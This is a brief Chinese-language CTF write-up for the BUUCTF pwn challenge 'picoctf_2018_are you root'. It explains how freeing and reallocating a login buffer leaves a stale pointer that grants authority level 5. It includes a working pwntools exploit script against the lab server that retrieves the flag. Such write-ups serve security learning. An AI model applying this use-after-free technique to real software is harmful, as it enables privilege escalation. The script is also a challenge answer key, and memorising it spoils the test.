strdup: malloc一個參數(shù)字符串大小的內(nèi)存,并且將字符串拷貝進(jìn)去.

思路

利用login, 將我們想要的數(shù)據(jù)排列好, *(v6 + 2), 其實就是v6[2], 每四個字節(jié)就是一個數(shù)據(jù) 所以字符只需要是
’aaaaaaaa’ + p64(0x5), 注意大小應(yīng)該是0x10, 這樣最好,可以百分百申請回來 將其釋放掉

重新申請回來這樣就不是 * v6指向它了而是v6指向它了

from pwn import * p = remote('node3.buuoj.cn',27037) p.sendlineafter('>','login ' + 'a'*0x8 + p32(0x5) + 'aaaa') p.sendlineafter('>','reset') p.sendlineafter('>','login aa') p.sendlineafter('>','get-flag') p.interactive()

總結(jié)

以上是生活随笔為你收集整理的BUUCTF(pwn)picoctf_2018_are you root的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。